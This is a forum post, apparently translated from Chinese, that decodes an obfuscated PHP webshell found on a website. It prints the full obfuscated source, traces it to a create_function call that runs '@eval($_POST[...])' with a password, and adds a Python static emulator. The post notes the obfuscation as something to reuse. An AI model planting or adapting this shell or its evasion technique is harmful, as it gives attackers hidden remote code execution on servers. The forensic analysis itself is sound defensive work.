    Posted 2017-5-26 11:15:01
    Decrypting an obfuscated PHP one-liner shell
    antian365.com simeon
       As the contest between attack and defense has developed, the protection offered by hardware firewalls, software WAFs and anti-virus software has made the survival time of an ordinary webshell during a penetration ever shorter. In real penetration-testing engagements you may come across webshells left behind by earlier intruders; most of these have been obfuscated ("encrypted"), and analysing such a webshell yields the following information:
    1) File MD5 checksum: collect the webshell's MD5 value. Once a webshell has been obfuscated its content is generally not changed again, so the MD5 of the file content stays relatively fixed.
    2) Decrypt the source to obtain the shell password. If the password is not a common one, it can be used to profile the author's password habits and, together with social-engineering (leaked-credential) databases, to trace the attacker's tracks.
    3) Collect keywords from the source code; distinctive information such as a QQ number may have been left in the webshell source.
       This article decrypts and analyses one collected webshell (a one-liner backdoor), studying the obfuscation ideas and strengths of others so that they can be reused later; it also analyses and introduces several common string-transformation functions used by such obfuscation.
    1.1 Source code
    The one-liner backdoor file was obtained from a directory of a website. Viewing its source shows what is basically a pile of garbage; from experience this is a one-liner that has been mutated. Its complete source code is as follows:
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6);
    $lvcg =str_split("muk9aw28wltcq",6);
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5);
    $jl =stripos("epxwkl7f66tfkt","jl");
    $t = $t.substr("tQGV2YWwJcVu4",1,6);
    $eia7 =trim("j8l2wml46reen");
    $b =$b.substr("kbase64kBDt9L6nm",1,6);
    $ig =trim("b39w0gnuli");
    $y =$y.$xN("rY","","crYrerYa");
    $yu1 =str_split("bi1b87m8a0o6x",2);
    $t =$t.$xN("xA6x","","wxA6xoJF9");
    $nd =stripos("n65t88rxn02edj3f0","nd");
    $b =$b.$xN("wI39","","_wI39dwI39ec");
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3);
    $y =$y.substr("hyte_funwViSVE4J",2,6);
    $yf7 =strlen("uehu49g6tg5ko");
    $t =$t.$xN("fp","","QfpTfp1Nfp");
    $m9 =strlen("eul604cobk");
    $b = $b.substr("l0W1odelA1eSnEJ",4,3);
    $h0bw =trim("n3e5h0cqtokvgob8tx");
    $y =$y.$xN("yb","","cybtio");
    $s7a =rtrim("auebyc9g4t5d8k");
    $t =$t.substr("bMs0nBh83UWyd",9,4);
    $d59q =stripos("cjvuckoy5wf3otea","d59q");
    $y =$y.substr("nD9HxQSL8ngR",9,1);
    $l1 = str_split("agqq09gbqn1",4);
    $t =$t.$xN("w6o4","","wcDw6o4Yw6o40");
    $py =stripos("lgy8htrrv1tc3","py");
    $t =$t.$xN("eP32","","bXFeP32h");
    $xp3d =stripos("ukl0nbnx9gt3","xp3d");
    $t =$t.substr("ikJ00HJMngxc",7,5);
    $dt2b =strlen("e4a5abuajw3vlcira");
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
    $ubj =strlen("wghjnft2op5kx1c086t");
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6);
    $qx =strlen("rlqfkkftro8gfko7ya");
    $t =$t.substr("r7y",1,1);
    $mu =rtrim("ngdxwux5vqe1");
    $j =$y("", $b($t));
    $bnlp =strlen("vufy0ak1fyav");
    $sdh =str_split("wmnjvg3c7p0m",4);
    $mb =ltrim("n52p1pgaepeokf");
    $e0pw =rtrim("uu4mhgp5c9pna4egq");
    $ugh =trim("rcpd3o9w99tio9");
    $grck =strlen("x5rix5bp1xky7");
    $eo6t =strlen("ddi1h14ecuyuc7d");$j();
    $dvnq = str_split("prm6giha1vro3604au",8);
    $ug8 =rtrim("ec8w52supb4vu8eo");
    $rct =stripos("hxe6wo7ewd8me7dt","rct");
    $ekqf =str_split("prf5y08e8flffw025j8",8);
    $vyr =str_split("umpjcsrfg6h5nd6o45",9);
    $wrf =rtrim("fyx99o7938h7ugqh");
    $q14 =strlen("tc46osxl1st1ic2");
    function o( ){   };
    $usf =strlen("fltcpxb7tfbjsmt");
    ?>
    1.2 Functions used in the source code
       Counting and de-duplicating the functions that appear in the code, the main ones are:
      1) substr: substr(string,start,length) returns part of a string. Its parameters:
    string   Required. The string of which a part is returned.
    start    Required. Where in the string to start: a positive value starts at that position in the string, a negative value starts that many characters from the end of the string, and 0 starts at the first character.
    length   Optional. The length of the returned string; by default it runs to the end of the string. A positive value is a length counted from the start position, a negative value is a length counted back from the end of the string. The following code shows a concrete use; the result is shown in Figure 1.
    <?php
    echo substr("Hello world",6);
    echo '<br>';
    echo substr("iyb42str_relgP804",5,6);
    ?>
    For the string "Hello world" with start 6 and length not set (the default, meaning up to the end of the string), the characters from position 6 to the end are taken, so the value is "world".
    substr("iyb42str_relgP804",5,6) takes 6 characters of "iyb42str_relgP804" starting at position 5, giving "str_re".
    Figure 1 Result of running the code
      2) str_split: str_split(string,length) splits a string into an array. Its parameters:
    string   Required. The string to split.
    length   Optional. The length of each array element; the default is 1.
    $lvcg =str_split("muk9aw28wltcq",6);
    The line above splits the string into pieces of 6 characters, i.e. every six characters go into one array element. Printing the array with print_r(str_split("muk9aw28wltcq",6)); gives the result shown in Figure 2:
    Array ( [0] => muk9aw [1] => 28wltc [2] => q )
    Figure 2 Splitting a string with str_split
      3) stripos() finds the position of the first occurrence of a string inside another string (case-insensitive).
      4) trim() removes whitespace or other predefined characters from both ends of a string. In this code trim() is used only to strip spaces before and after a string. rtrim() and ltrim() strip whitespace, or the specified characters, from the right or the left end respectively.
      5) strlen() returns the length of a string.
      6) str_replace: str_replace(find,replace,string,count) replaces some characters in a string with other characters (case-sensitive). Its parameters:
    find     Required. The value to search for.
    replace  Required. The value that replaces find.
    string   Required. The string to be searched.
    count    Optional. A variable that receives the number of replacements.
    Put another way, str_replace(find,replace,string,count) searches string for find and substitutes replace for it; count is the number of replacements made.
      7) function(): calling a function.
    1.3 Recovering the shell password
    Reading the obfuscated source with the help of the functions above:
    The core line is
    $j =$y("", $b($t)); which, once the variables are resolved, is create_function("", base64_decode("QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53NjgnXSk7"))
    QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53NjgnXSk7 is base64-encoded; decoding it gives the one-liner hidden by the obfuscation:
    @eval($_POST['pp64mqa2x1rnw68']);
    Line-by-line analysis of what the code computes
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6); // yields "str_re"
    $lvcg =str_split("muk9aw28wltcq",6); // Array ( [0] => muk9aw [1] => 28wltc [2] => q ); junk
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5); // appends "place"; $xN is now "str_replace"
    $jl =stripos("epxwkl7f66tfkt","jl"); // no match (false); junk
    $t =$t.substr("tQGV2YWwJcVu4",1,6); // $t is "QGV2YW"
    $eia7 =trim("j8l2wml46reen"); // junk
    $b =$b.substr("kbase64kBDt9L6nm",1,6); // $b is "base64"
    $ig =trim("b39w0gnuli"); // junk
    $y =$y.$xN("rY","","crYrerYa"); // i.e. str_replace("rY","","crYrerYa"); $y is "crea"
    $yu1 =str_split("bi1b87m8a0o6x",2); // Array ( [0] => bi [1] => 1b [2] => 87 [3] => m8 [4] => a0 [5] => o6 [6] => x ); junk
    $t =$t.$xN("xA6x","","wxA6xoJF9"); // appends "woJF9"; $t is "QGV2YWwoJF9"
    $nd =stripos("n65t88rxn02edj3f0","nd"); // no match (false); junk
    $b =$b.$xN("wI39","","_wI39dwI39ec"); // appends "_dec"; $b is "base64_dec"
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3); // junk
    $y =$y.substr("hyte_funwViSVE4J",2,6); // appends "te_fun"; $y is "create_fun"
    $yf7 =strlen("uehu49g6tg5ko"); // junk
    $t =$t.$xN("fp","","QfpTfp1Nfp"); // appends "QT1N"; $t is "QGV2YWwoJF9QT1N"
    $m9 =strlen("eul604cobk"); // junk
    $b = $b.substr("l0W1odelA1eSnEJ",4,3); // appends "ode"; $b is "base64_decode"
    $h0bw =trim("n3e5h0cqtokvgob8tx"); // junk
    $y =$y.$xN("yb","","cybtio"); // appends "ctio"; $y is "create_functio"
    $s7a =rtrim("auebyc9g4t5d8k"); // junk
    $t =$t.substr("bMs0nBh83UWyd",9,4); // appends "UWyd"; $t is "QGV2YWwoJF9QT1NUWyd"
    $d59q =stripos("cjvuckoy5wf3otea","d59q"); // no match (false); junk
    $y =$y.substr("nD9HxQSL8ngR",9,1); // appends "n"; $y is "create_function"
    $l1 =str_split("agqq09gbqn1",4); // junk
    $t =$t.$xN("w6o4","","wcDw6o4Yw6o40"); // appends "wcDY0"; $t is "QGV2YWwoJF9QT1NUWydwcDY0"
    $py =stripos("lgy8htrrv1tc3","py"); // no match (false); junk
    $t =$t.$xN("eP32","","bXFeP32h"); // appends "bXFh"; $t is "QGV2YWwoJF9QT1NUWydwcDY0bXFh"
    $xp3d =stripos("ukl0nbnx9gt3","xp3d"); // no match (false); junk
    $t =$t.substr("ikJ00HJMngxc",7,5); // appends "Mngxc"; $t is "QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxc"
    $dt2b =strlen("e4a5abuajw3vlcira"); // junk
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4); // appends "m53N"; $t is "QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53N"
    $ubj =strlen("wghjnft2op5kx1c086t"); // junk
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6); // appends "jgnXSk"; $t is "QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53NjgnXSk"
    $qx =strlen("rlqfkkftro8gfko7ya"); // junk
    $t =$t.substr("r7y",1,1); // appends "7"; $t is "QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53NjgnXSk7"
    $mu =rtrim("ngdxwux5vqe1"); // junk
    $j =$y("", $b($t)); // the key line: create_function("", base64_decode("QGV2YWwoJF9QT1NUWydwcDY0bXFhMngxcm53NjgnXSk7"))
    $bnlp =strlen("vufy0ak1fyav"); // 12; junk
    $sdh =str_split("wmnjvg3c7p0m",4); // junk
    $mb =ltrim("n52p1pgaepeokf"); // junk
    $e0pw =rtrim("uu4mhgp5c9pna4egq"); // junk
    $ugh =trim("rcpd3o9w99tio9"); // junk
    $grck =strlen("x5rix5bp1xky7"); // 13; junk
    $eo6t =strlen("ddi1h14ecuyuc7d"); // 15; junk
    $j(); // calls the generated function, i.e. runs @eval($_POST['pp64mqa2x1rnw68']);
    $dvnq =str_split("prm6giha1vro3604au",8); // junk
    $ug8 =rtrim("ec8w52supb4vu8eo"); // junk
    $rct =stripos("hxe6wo7ewd8me7dt","rct"); // no match (false); junk
    $ekqf =str_split("prf5y08e8flffw025j8",8); // junk
    $vyr =str_split("umpjcsrfg6h5nd6o45",9); // junk
    $wrf = rtrim("fyx99o7938h7ugqh"); // junk
    $q14 =strlen("tc46osxl1st1ic2"); // junk
    function o( ){   }; // empty function; junk
    $usf =strlen("fltcpxb7tfbjsmt"); // junk
    ?>
    1.4 Another way to decrypt it
        Print the result of each function call and judge from the output; the code can be modified as follows:
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6);
    print"xN is $xN  ";
    echo"<br>";
    $lvcg =str_split("muk9aw28wltcq",6);
    print"lvcg is $lvcg";
    echo"<br>";
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5);
    print"xN is $xN";
    echo"<br>";
    $jl =stripos("epxwkl7f66tfkt","jl");
    print"jl is $jl";
    echo"<br>";
    $t =$t.substr("tQGV2YWwJcVu4",1,6);
    print"t is $t";
    echo"<br>";
    $eia7 =trim("j8l2wml46reen");
    print"eia7 is $eia7";
    echo"<br>";
    $b =$b.substr("kbase64kBDt9L6nm",1,6);
    print"b is $b";
    echo"<br>";
    $ig =trim("b39w0gnuli");
    print"ig is $ig";
    echo"<br>";
    $y = $y.$xN("rY","","crYrerYa");
    print"y is $y";
    echo"<br>";
    $yu1 =str_split("bi1b87m8a0o6x",2);
    print"yu1 is $yu1";
    echo"<br>";
    $t =$t.$xN("xA6x","","wxA6xoJF9");
    print"t is $t";
    echo"<br>";
    $nd =stripos("n65t88rxn02edj3f0","nd");
    print"nd is $nd";
    echo"<br>";
    $b =$b.$xN("wI39","","_wI39dwI39ec");
    print"b is $b";
    echo"<br>";
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3);
    print"h8ps is $h8ps";
    echo"<br>";
    $y =$y.substr("hyte_funwViSVE4J",2,6);
    print"y is $y";
    echo"<br>";
    $yf7 = strlen("uehu49g6tg5ko");
    print"yf7 is $yf7";
    echo"<br>";
    $t =$t.$xN("fp","","QfpTfp1Nfp");
    print"t is $t";
    echo"<br>";
    $m9 =strlen("eul604cobk");
    print"m9 is $m9";
    echo"<br>";
    $b =$b.substr("l0W1odelA1eSnEJ",4,3);
    print"b is $b";
    echo"<br>";
    $h0bw =trim("n3e5h0cqtokvgob8tx");
    print"h0bw is $h0bw";
    echo"<br>";
    $y =$y.$xN("yb","","cybtio");
    print"y is $y";
    echo"<br>";
    $s7a =rtrim("auebyc9g4t5d8k");
    print"s7a  is $s7a ";
    echo"<br>";
    $t =$t.substr("bMs0nBh83UWyd",9,4);
    print"t is $t";
    echo"<br>";
    $d59q =stripos("cjvuckoy5wf3otea","d59q");
    print"d59q is $d59q";
    echo"<br>";
    $y =$y.substr("nD9HxQSL8ngR",9,1);
    print"y is $y";
    echo"<br>";
    $l1 =str_split("agqq09gbqn1",4);
    print"l1 is $l1";
    echo"<br>";
    $t = $t.$xN("w6o4","","wcDw6o4Yw6o40");
    print"t is $t";
    echo"<br>";
    $py =stripos("lgy8htrrv1tc3","py");
    print"py is $py";
    echo"<br>";
    $t =$t.$xN("eP32","","bXFeP32h");
    print"t is $t";
    echo"<br>";
    $xp3d =stripos("ukl0nbnx9gt3","xp3d");
    print"xp3d is $xp3d";
    echo"<br>";
    $t =$t.substr("ikJ00HJMngxc",7,5);
    print"t is $t";
    echo"<br>";
    $dt2b =strlen("e4a5abuajw3vlcira");
    print"dt2b is $dt2b";
    echo"<br>";
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
    print"t is $t";
    echo"<br>";
    $ubj = strlen("wghjnft2op5kx1c086t");
    print"ubj is $ubj";
    echo"<br>";
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6);
    print"t is $t";
    echo"<br>";
    $qx =strlen("rlqfkkftro8gfko7ya");
    print"qx  is $qx ";
    echo"<br>";
    $t =$t.substr("r7y",1,1);
    print"t is $t";
    echo"<br>";
    $mu =rtrim("ngdxwux5vqe1");
    print"mu  is $mu ";
    echo"<br>";
    $j =$y("", $b($t));
    print"j is $j";
    echo"<br>";
    $bnlp =strlen("vufy0ak1fyav");
    print"bnlp is $bnlp";
    echo"<br>";
    $sdh =str_split("wmnjvg3c7p0m",4);
    print"sdh is $sdh";
    echo "<br>";
    $mb =ltrim("n52p1pgaepeokf");
    print"mb is $mb";
    echo"<br>";
    $e0pw =rtrim("uu4mhgp5c9pna4egq");
    print"e0pw is $e0pw";
    echo"<br>";
    $ugh =trim("rcpd3o9w99tio9");
    print"ugh is $ugh";
    echo"<br>";
    $grck =strlen("x5rix5bp1xky7");
    print"grck is $grck";
    echo"<br>";
    $eo6t =strlen("ddi1h14ecuyuc7d");$j();
    print"eo6t is $eo6t";
    echo"<br>";
    $dvnq =str_split("prm6giha1vro3604au",8);
    print"dvnq is $dvnq";
    echo"<br>";
    $ug8 =rtrim("ec8w52supb4vu8eo");
    print"ug8 is $ug8";
    echo"<br>";
    $rct =stripos("hxe6wo7ewd8me7dt","rct");
    print"rct is $rct";
    echo"<br>";
    $ekqf =str_split("prf5y08e8flffw025j8",8);
    print"ekqf  is $ekqf ";
    echo"<br>";
    $vyr =str_split("umpjcsrfg6h5nd6o45",9);
    print"vyr is $vyr";
    echo"<br>";
    $wrf =rtrim("fyx99o7938h7ugqh");
    print"wrf is $wrf";
    echo"<br>";
    $q14 =strlen("tc46osxl1st1ic2");
    print "q14 is $q14";
    echo "<br>";
    function o( ){   };
    $usf =strlen("fltcpxb7tfbjsmt");
    echo"<br>";
    print$usf;
    ?>
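Sections 1.3 and 1.4 resolve the builder statements either by hand or by running the PHP with print statements added. As an added example (mine, not code from the post), the Python below statically emulates the shell's substr / str_replace / base64_decode chains, treats every builtin it does not model as junk, and records the create_function body instead of compiling it, so the one-liner and its password are recovered without ever executing the webshell; the input is the post's own builder statements, packed two per line.

```python
import base64
import re
# Constructed input (added example, not the post's code): the shell's own string-building
# statements from the post, two per line, plus one junk statement ($jl) to show it being ignored.
SHELL = r'''
$xN =$xN.substr("iyb42str_relgP804",5,6); $jl =stripos("epxwkl7f66tfkt","jl");
$xN =$xN.substr("l9cdplacepArBE9dk",4,5); $t = $t.substr("tQGV2YWwJcVu4",1,6);
$b =$b.substr("kbase64kBDt9L6nm",1,6); $y =$y.$xN("rY","","crYrerYa");
$t =$t.$xN("xA6x","","wxA6xoJF9"); $b =$b.$xN("wI39","","_wI39dwI39ec");
$y =$y.substr("hyte_funwViSVE4J",2,6); $t =$t.$xN("fp","","QfpTfp1Nfp");
$b = $b.substr("l0W1odelA1eSnEJ",4,3); $y =$y.$xN("yb","","cybtio");
$t =$t.substr("bMs0nBh83UWyd",9,4); $y =$y.substr("nD9HxQSL8ngR",9,1);
$t =$t.$xN("w6o4","","wcDw6o4Yw6o40"); $t =$t.$xN("eP32","","bXFeP32h");
$t =$t.substr("ikJ00HJMngxc",7,5); $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
$t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6); $t =$t.substr("r7y",1,1);
$j =$y("", $b($t));
'''
# PHP builtins the shell needs (Python slicing matches PHP substr here); create_function only records the body.
BUILTINS = {"substr": lambda s, a, n=None: s[a:] if n is None else s[a:][:n],
            "str_replace": lambda f, r, s: s.replace(f, r),
            "base64_decode": lambda s: base64.b64decode(s).decode(),
            "create_function": lambda args, body: body}

def split_top(s, sep):
    """Split on sep outside quotes and parentheses, so nested calls like $b($t) survive."""
    out, cur, depth, quoted = [], "", 0, False
    for ch in s:
        quoted ^= ch == '"'
        depth += 0 if quoted else (ch == "(") - (ch == ")")
        if ch == sep and depth == 0 and not quoted:
            out, cur = out + [cur], ""
        else:
            cur += ch
    return out + [cur]

def ev(expr, env):
    """Evaluate a '.'-concatenation of literals, $vars and calls; the callee may be a $var."""
    parts = split_top(expr.strip(), ".")
    if len(parts) > 1:
        return "".join(ev(p, env) for p in parts)
    e, call = parts[0], re.fullmatch(r"(\$?\w+)\((.*)\)", parts[0], re.S)
    if call:  # builtins not modelled above (stripos, trim, strlen ...) evaluate to None: junk
        name = env.get(call[1][1:]) if call[1][0] == "$" else call[1]
        return BUILTINS.get(name, lambda *a: None)(*[ev(a, env) for a in split_top(call[2], ",")])
    return e[1:-1] if e[0] == '"' else env.get(e[1:], "") if e[0] == "$" else int(e)
def emulate(src):  # statically runs every `$v = expr;` in source order; no PHP is executed
    env = {}
    for var, expr in re.findall(r"\$(\w+)\s*=\s*([^;]*);", src):
        env[var] = ev(expr, env)
    return env
```

After emulate(SHELL), env["j"] holds the decoded one-liner and env["t"] the base64 string, which can be hashed and filed as indicators alongside the file's MD5.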

    Posted 2017-6-6 11:44:19
    yyyxy (administrator): Nice approach, and the meaning of the code was analysed line by line; keep it up next time.

    Posted 2017-6-9 17:05:45
    Hacker bro, give us a round of cryptography next.